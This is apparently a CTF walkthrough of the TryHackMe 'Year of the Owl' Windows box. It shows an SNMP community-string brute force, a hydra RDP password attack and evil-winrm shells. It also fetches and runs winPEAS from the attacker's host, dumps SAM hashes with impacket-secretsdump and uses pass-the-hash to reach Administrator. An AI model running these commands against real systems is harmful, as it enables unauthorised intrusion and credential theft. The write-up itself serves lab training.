TryHackMe: Year Of The Owl https://tryhackme.com/room/yearoftheowl by MuirlandOracle
Enumeration
Let's fire off rustscan
$ rustscan -a owl -- -sC -sV -A -oA yearoftheowl -v
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.128.205:80
Open 10.10.128.205:139
Open 10.10.128.205:443
Open 10.10.128.205:445
Open 10.10.128.205:3306
Open 10.10.128.205:3389
Open 10.10.128.205:5985
Open 10.10.128.205:47001
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-30 23:20 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:20
Completed NSE at 23:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:20
Completed NSE at 23:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:20
Completed NSE at 23:20, 0.00s elapsed
Initiating Ping Scan at 23:20
Scanning 10.10.128.205 [2 ports]
Completed Ping Scan at 23:20, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 23:20
Scanning yearoftheowl (10.10.128.205) [8 ports]
Discovered open port 139/tcp on 10.10.128.205
Discovered open port 443/tcp on 10.10.128.205
Discovered open port 80/tcp on 10.10.128.205
Discovered open port 3389/tcp on 10.10.128.205
Discovered open port 445/tcp on 10.10.128.205
Discovered open port 3306/tcp on 10.10.128.205
Discovered open port 5985/tcp on 10.10.128.205
Discovered open port 47001/tcp on 10.10.128.205
Completed Connect Scan at 23:20, 0.03s elapsed (8 total ports)
Initiating Service scan at 23:20
Scanning 8 services on yearoftheowl (10.10.128.205)
Completed Service scan at 23:20, 12.19s elapsed (8 services on 1 host)
NSE: Script scanning 10.10.128.205.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:20
NSE Timing: About 99.91% done; ETC: 23:21 (0:00:00 remaining)
Completed NSE at 23:21, 40.30s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.43s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
Nmap scan report for yearoftheowl (10.10.128.205)
Host is up, received syn-ack (0.035s latency).
Scanned at 2020-11-30 23:20:18 GMT for 53s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
| SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds? syn-ack
3306/tcp open mysql? syn-ack
| fingerprint-strings:
| FourOhFourRequest, GenericLines, NULL:
|_ Host 'ip-10-9-5-198.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host 'ip-10-9-5-198.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: YEAR-OF-THE-OWL
| NetBIOS_Domain_Name: YEAR-OF-THE-OWL
| NetBIOS_Computer_Name: YEAR-OF-THE-OWL
| DNS_Domain_Name: year-of-the-owl
| DNS_Computer_Name: year-of-the-owl
| Product_Version: 10.0.17763
|_ System_Time: 2020-11-30T23:20:31+00:00
| ssl-cert: Subject: commonName=year-of-the-owl
| Issuer: commonName=year-of-the-owl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-16T19:04:21
| Not valid after: 2021-03-18T19:04:21
| MD5: a4ad f32c 5473 eee3 2d2c ca88 c231 7879
| SHA-1: 1824 b248 b428 857e 8ce6 f1f3 d60d 333a d679 5c5b
|_ssl-date: 2020-11-30T23:21:11+00:00; 0s from scanner time.
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 24626/tcp): CLEAN (Timeout)
| Check 2 (port 51517/tcp): CLEAN (Timeout)
| Check 3 (port 26276/udp): CLEAN (Timeout)
| Check 4 (port 47591/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-30T23:20:35
|_ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.65 seconds
80 - HTTP
Redirects to www.********, so updated /etc/hosts and get the below:
Just an owl.... nothing hidden with steg....
443 - HTTPS
HTTPS appears to be the same as HTTP, nothing different from first glance...
139 - RPC / 445 - SMB
enum4linux, smbclient and thunar not bringing anything back...
3306 - MySQL
No access
3389 - MS RDP
No access
5985 - HTTPAPI
Nothing to see here ...
47001 - HTTPAPI
Nothing to see here ...
Flag1
User Flag
Tried all sorts against the various servers without any joy and then got the hint: UDP ...... Tried scanning for open UDP ports and trying a few different things.... but after a couple of extends on the box, RAGE QUIT.
..... Picking it back up and finding out it was SNMP, I ran onesixtyone to find the community string:
╰─⠠⠵ onesixtyone 10.10.24.181 -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt
Scanning 1 hosts, 3219 communities
10.10.24.181 [openview] Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
Then snmp-check to enumerate SNMP:
╰─⠠⠵ snmp-check 10.10.24.181 -c openview
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.10.24.181:161 using SNMPv1 and community 'openview'
[*] System information:
Host IP address : 10.10.24.181
Hostname : year-of-the-owl
Description : Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
Contact : -
Location : -
Uptime snmp : 00:05:43.68
Uptime system : 00:04:46.45
System date : 2021-2-14 23:45:37.3
Domain : WORKGROUP
[*] User accounts:
Guest
[REDACTED]
Administrator
DefaultAccount
WDAGUtilityAccount
[*] Network information:
IP forwarding enabled : no
Default TTL : 128
TCP segments received : 63
TCP segments sent : 99
TCP segments retrans : 71
Input datagrams : 3361
Delivered datagrams : 3437
Output datagrams : 278
[*] Network interfaces:
Interface : [ up ] Software Loopback Interface 1
Id : 1
Mac Address : :::::
Type : softwareLoopback
Speed : 1073 Mbps
MTU : 1500
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft 6to4 Adapter
Id : 2
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft IP-HTTPS Platform Adapter
Id : 3
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft Kernel Debug Network Adapter
Id : 4
Mac Address : :::::
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Intel(R) 82574L Gigabit Network Connection
Id : 5
Mac Address : 00:0c:29:02:45:89
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft Teredo Tunneling Adapter
Id : 6
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ up ] AWS PV Network Device #0
Id : 7
Mac Address : 02:4f:09:70:3a:af
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 295983
Out octets : 29788
Interface : [ up ] AWS PV Network Device #0-WFP Native MAC Layer LightWeight Filter-0000
Id : 8
Mac Address : 02:4f:09:70:3a:af
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 295983
Out octets : 29788
Interface : [ up ] AWS PV Network Device #0-QoS Packet Scheduler-0000
Id : 9
Mac Address : 02:4f:09:70:3a:af
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 295983
Out octets : 29788
Interface : [ up ] AWS PV Network Device #0-WFP 802.3 MAC Layer LightWeight Filter-0000
Id : 10
Mac Address : 02:4f:09:70:3a:af
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 295983
Out octets : 29788
[*] Network IP:
Id IP Address Netmask Broadcast
7 10.10.24.181 255.255.0.0 1
1 127.0.0.1 255.0.0.0 1
[*] Routing information:
Destination Next hop Mask Metric
0.0.0.0 10.10.0.1 0.0.0.0 25
10.10.0.0 10.10.24.181 255.255.0.0 281
10.10.24.181 10.10.24.181 255.255.255.255 281
10.10.255.255 10.10.24.181 255.255.255.255 281
127.0.0.0 127.0.0.1 255.0.0.0 331
127.0.0.1 127.0.0.1 255.255.255.255 331
127.255.255.255 127.0.0.1 255.255.255.255 331
169.254.169.123 10.10.0.1 255.255.255.255 50
169.254.169.249 10.10.0.1 255.255.255.255 50
169.254.169.250 10.10.0.1 255.255.255.255 50
169.254.169.251 10.10.0.1 255.255.255.255 50
169.254.169.253 10.10.0.1 255.255.255.255 50
169.254.169.254 10.10.0.1 255.255.255.255 50
224.0.0.0 127.0.0.1 240.0.0.0 331
255.255.255.255 127.0.0.1 255.255.255.255 331
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 135 0.0.0.0 0 listen
0.0.0.0 443 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 3306 0.0.0.0 0 listen
0.0.0.0 3389 0.0.0.0 0 listen
0.0.0.0 5985 0.0.0.0 0 listen
0.0.0.0 47001 0.0.0.0 0 listen
0.0.0.0 49664 0.0.0.0 0 listen
0.0.0.0 49665 0.0.0.0 0 listen
0.0.0.0 49666 0.0.0.0 0 listen
0.0.0.0 49667 0.0.0.0 0 listen
0.0.0.0 49668 0.0.0.0 0 listen
0.0.0.0 49669 0.0.0.0 0 listen
10.10.24.181 139 0.0.0.0 0 listen
10.10.24.181 49717 138.91.136.108 443 synSent
10.10.24.181 49718 52.152.110.14 443 synSent
10.10.24.181 49719 23.195.139.83 443 synSent
[*] Listening UDP ports:
Local address Local port
0.0.0.0 123
0.0.0.0 161
0.0.0.0 3389
0.0.0.0 5353
0.0.0.0 5355
10.10.24.181 137
10.10.24.181 138
127.0.0.1 63761
[*] Network services:
Index Name
0 Power
1 mysql
2 Server
3 Themes
4 SysMain
5 Apache2.4
6 IP Helper
7 DNS Client
8 DHCP Client
9 Time Broker
10 Workstation
11 SNMP Service
12 User Manager
13 Windows Time
14 CoreMessaging
15 Plug and Play
16 Print Spooler
17 Task Scheduler
18 Windows Update
19 Remote Registry
20 Amazon SSM Agent
21 CNG Key Isolation
22 COM+ Event System
23 Windows Event Log
24 IPsec Policy Agent
25 Group Policy Client
26 RPC Endpoint Mapper
27 Web Account Manager
28 AWS Lite Guest Agent
29 Device Setup Manager
30 Network List Service
31 System Events Broker
32 User Profile Service
33 Base Filtering Engine
34 Local Session Manager
35 TCP/IP NetBIOS Helper
36 Cryptographic Services
37 Certificate Propagation
38 Remote Desktop Services
39 Shell Hardware Detection
40 State Repository Service
41 Diagnostic Policy Service
42 Network Connection Broker
43 Security Accounts Manager
44 Windows Defender Firewall
45 Network Location Awareness
46 Windows Connection Manager
47 Windows Font Cache Service
48 Remote Procedure Call (RPC)
49 Update Orchestrator Service
50 User Access Logging Service
51 DCOM Server Process Launcher
52 Remote Desktop Configuration
53 Network Store Interface Service
54 Client License Service (ClipSVC)
55 Distributed Link Tracking Client
56 AppX Deployment Service (AppXSVC)
57 System Event Notification Service
58 Connected Devices Platform Service
59 Windows Defender Antivirus Service
60 Windows Management Instrumentation
61 Distributed Transaction Coordinator
62 Microsoft Account Sign-in Assistant
63 Background Tasks Infrastructure Service
64 Connected User Experiences and Telemetry
65 WinHTTP Web Proxy Auto-Discovery Service
66 Windows Push Notifications System Service
67 Windows Remote Management (WS-Management)
68 Remote Desktop Services UserMode Port Redirector
69 Windows Defender Antivirus Network Inspection Service
[*] Processes:
Id Status Name Path Parameters
1 running System Idle Process
4 running System
68 running Registry
412 running smss.exe
504 running svchost.exe C:\Windows\System32\ -k LocalServiceNetworkRestricted -p
512 running dwm.exe
568 running csrss.exe
640 running svchost.exe C:\Windows\system32\ -k netsvcs -p
644 running csrss.exe
660 running wininit.exe
704 running winlogon.exe
764 running svchost.exe C:\Windows\System32\ -k LocalSystemNetworkRestricted -p
768 running services.exe
788 running lsass.exe C:\Windows\system32\
848 running svchost.exe C:\Windows\System32\ -k termsvcs
884 running svchost.exe C:\Windows\system32\ -k DcomLaunch -p
904 running fontdrvhost.exe
912 running fontdrvhost.exe
980 running svchost.exe C:\Windows\system32\ -k RPCSS -p
1124 running amazon-ssm-agent.exe C:\Program Files\Amazon\SSM\
1136 running upfc.exe
1188 running svchost.exe C:\Windows\system32\ -k LocalService -p
1276 running svchost.exe C:\Windows\System32\ -k NetworkService -p
1308 running svchost.exe C:\Windows\system32\ -k LocalServiceNetworkRestricted -p
1380 running LiteAgent.exe C:\Program Files\Amazon\XenTools\
1396 running svchost.exe C:\Windows\system32\ -k LocalServiceNoNetworkFirewall -p
1488 running svchost.exe C:\Windows\system32\ -k LocalServiceNoNetwork -p
1744 running svchost.exe C:\Windows\system32\ -k netsvcs
1868 running spoolsv.exe C:\Windows\System32\
1904 running svchost.exe C:\Windows\System32\ -k utcsvc -p
1984 running svchost.exe C:\Windows\system32\ -k LocalService
2016 running MsMpEng.exe
2040 running snmp.exe C:\Windows\System32\
2052 running httpd.exe C:\xampp\apache\bin\ -k runservice
2084 running mysqld.exe C:\xampp\mysql\bin\ --defaults-file=c:\xampp\mysql\bin\my.ini mysql
2104 running svchost.exe C:\Windows\System32\ -k smbsvcs
2324 running svchost.exe C:\Windows\system32\ -k NetworkServiceNetworkRestricted -p
2836 running LogonUI.exe /flags:0x2 /state0:0xa3a7c855 /state1:0x41c64e6d
3028 running httpd.exe C:\xampp\apache\bin\ -d C:/xampp/apache
3708 running svchost.exe
3748 running MpCmdRun.exe C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\ SignatureUpdate -ScheduleJob -RestrictPrivileges -Reinvoke
3936 running NisSrv.exe
4408 running svchost.exe C:\Windows\system32\ -k appmodel -p
4572 running msdtc.exe C:\Windows\System32\
4948 running MpCmdRun.exe C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\ SignaturesUpdateService -ScheduleJob -HttpDownload -RestrictPrivileges -Reinvoke
5052 running WmiPrvSE.exe C:\Windows\system32\wbem\
[*] Storage information:
Description : ["C:\\ Label: Serial Number 7c0c3814"]
Device id : [#<SNMP::Integer:0x000055f7ab447e30 @value=1>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x000055f7ab442818 @value=4096>]
Memory size : 19.46 GB
Memory used : 15.49 GB
Description : ["Virtual Memory"]
Device id : [#<SNMP::Integer:0x000055f7ab3e37f0 @value=2>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x000055f7ab2d1808 @value=65536>]
Memory size : 3.12 GB
Memory used : 837.56 MB
Description : ["Physical Memory"]
Device id : [#<SNMP::Integer:0x000055f7ab756220 @value=3>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x000055f7ab7543d0 @value=65536>]
Memory size : 2.00 GB
Memory used : 750.62 MB
[*] File system information:
Index : 1
Mount point :
Remote mount point : -
Access : 1
Bootable : 0
[*] Device information:
Id Type Status Descr
1 unknown running Microsoft XPS Document Writer v4
2 unknown running Microsoft Print To PDF
3 unknown running Unknown Processor Type
4 unknown unknown Software Loopback Interface 1
5 unknown unknown Microsoft 6to4 Adapter
6 unknown unknown Microsoft IP-HTTPS Platform Adapter
7 unknown unknown Microsoft Kernel Debug Network Adapter
8 unknown unknown Intel(R) 82574L Gigabit Network Connection
9 unknown unknown Microsoft Teredo Tunneling Adapter
10 unknown unknown AWS PV Network Device #0
11 unknown unknown AWS PV Network Device #0-WFP Native MAC Layer LightWeight Filter
12 unknown unknown AWS PV Network Device #0-QoS Packet Scheduler-0000
13 unknown unknown AWS PV Network Device #0-WFP 802.3 MAC Layer LightWeight Filter-
14 unknown running Fixed Disk
15 unknown running Fixed Disk
16 unknown running IBM enhanced (101- or 102-key) keyboard, Subtype=(0)
17 unknown unknown COM1:
[*] Software components:
Index Name
1 XAMPP
2 Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.11.25325
3 Microsoft Visual C++ 2017 x64 Additional Runtime - 14.11.25325
4 Amazon SSM Agent
5 Amazon SSM Agent
6 Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325
From the above we have the following useful information:
[*] System information:
Host IP address : 10.10.24.181
Hostname : year-of-the-owl
Domain : WORKGROUP
[*] User accounts:
Guest
[REDACTED]
Administrator
DefaultAccount
WDAGUtilityAccount
OK, we have a username to try to enumerate: [REDACTED] ... Let's run hydra and see if we can brute force it:
╰─⠠⠵ hydra -l [REDACTED] -P /usr/share/wordlists/rockyou.txt owl rdp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-14 23:50:27
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344400 login tries (l:1/p:14344400), ~3586100 tries per task
[DATA] attacking rdp://owl:3389/
[3389][rdp] account on 10.10.24.181 might be valid but account not active for remote desktop: login: [REDACTED] password: [REDACTED], continuing attacking the account.
Hmmm, hydra reports a password but RDP throws an error...
Ok, if RDP does not work let's try something else ... Using evil-winrm we get a shell:
╰─⠠⠵ evil-winrm -i owl -u [REDACTED]
Enter Password:
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\[REDACTED]\Documents>
Navigating to C:\users\[REDACTED]\desktop we can use gc to read the content of user.txt:
*Evil-WinRM* PS C:\users\[REDACTED]\Documents> cd C:\users\[REDACTED]\desktop
*Evil-WinRM* PS C:\users\[REDACTED]\desktop> gc user.txt
[REDACTED]
Flag2
Admin Flag
Ok, now that we're on the box we need to privesc, let's grab winPEAS.bat and run it:
> invoke-webrequest 'http://10.9.5.198:9999/winPEAS.bat' -out peas.bat
> .\peas.bat
[+] SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
peas.bat : ERROR:
+ CategoryInfo : NotSpecified: (ERROR::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Description = Access denied
[+] CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
[+] UNQUOTED SERVICE PATHS
[i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
[i] The permissions are also checked and filtered using icacls
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
[*] DLL HIJACKING in PATHenv variable
[i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
[i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking
C:\Windows\system32 NT SERVICE\TrustedInstaller:(F)
C:\Windows NT SERVICE\TrustedInstaller:(F)
C:\Windows\System32\Wbem NT SERVICE\TrustedInstaller:(F)
C:\Users\[REDACTED]\AppData\Local\Microsoft\WindowsApps NT AUTHORITY\SYSTEM:(OI)(CI)(F)
YEAR-OF-THE-OWL\[REDACTED]:(OI)(CI)(F)
[*] CREDENTIALS
[+] WINDOWS VAULT
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault
Currently stored credentials:
* NONE *
[+] Unattended files
[+] SAM and SYSTEM backups
[+] McAffee SiteList.xml
Volume in drive C has no label.
Volume Serial Number is 7C0C-3814
At which point it crashed ........
Ok, let's look around the file system as it could be the AV breaking winPEAS...
*Evil-WinRM* PS C:\> gci -hidden .
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 9/18/2020 2:14 AM $Recycle.Bin
d--hsl 9/17/2020 7:27 PM Documents and Settings
d--h-- 9/18/2020 2:04 AM ProgramData
d--hs- 9/17/2020 7:27 PM Recovery
d--hs- 9/17/2020 7:26 PM System Volume Information
-a-hs- 2/14/2021 11:40 PM 1207959552 pagefile.sys
We have the Recycle Bin, let's take a look in there...
*Evil-WinRM* PS C:\> gci -path 'C:\$Recycle.Bin' -h
Directory: C:\$Recycle.Bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 9/18/2020 7:28 PM S-1-5-21-1987495829-1628902820-919763334-1001
d--hs- 11/13/2020 10:41 PM S-1-5-21-1987495829-1628902820-919763334-500
Ok, two directories in there ..... as with Linux there are some reserved / well-known SIDs / RIDs, and normally '....-500' would indicate a local administrator account, so let's skip that and have a look in ...-1001, which should be a user.
*Evil-WinRM* PS C:\> cd 'C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001'
*Evil-WinRM* PS C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001> gci
Directory: C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 7:28 PM 49152 sam.bak
-a---- 9/18/2020 7:28 PM 17457152 system.bak
Ooooo we have a sam.bak and system.bak ....... these normally allow you to grab the LM or NT hashes.... Can we download them?
Even though the download looks like it works from the $Recycle.Bin it does not; you need to copy them somewhere else first:
> download sam.bak
Info: Downloading C:\users\[REDACTED]\sam.bak to sam.bak
Progress: 6% : |▒░░░░░░░░░░|
Info: Download successful!
> download system.bak
Info: Downloading C:\users\[REDACTED]\system.bak to system.bak
Progress: 12% : |▒░░░░░░░░░|
Info: Download successful!
Ok, so using impacket-secretsdump we can smash these files together and get the hashes....
╰─⠠⠵ impacket-secretsdump -ts local -system system.bak -sam sam.bak
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[2021-02-15 00:48:43] [*] Target system bootKey: 0xd676472afd9cc13ac271e26890b87a8c
[2021-02-15 00:48:43] [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:[REDACTED]:[REDACTED]:::
Guest:501:[REDACTED]:[REDACTED]:[REDACTED]:::
DefaultAccount:503:[REDACTED]:[REDACTED]:::
WDAGUtilityAccount:504:[REDACTED]:[REDACTED]:::
[REDACTED]:1001:[REDACTED]:[REDACTED]:::
[2021-02-15 00:48:43] [*] Cleaning up...
Using the nthash we can then access the server:
╰─⠠⠵ evil-winrm -i owl -u administrator -H [REDACTED]
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
year-of-the-owl\administrator
We can then use gc to get the root flag..
*Evil-WinRM* PS C:\Users\Administrator\Documents> gc ..\Desktop\*txt
[REDACTED]
Finish
That was frustrating with the UDP / SNMP ....... also took me a while to get back around to doing this box.
Anyway, that is the series completed ( for now...., Year of the Ox ? )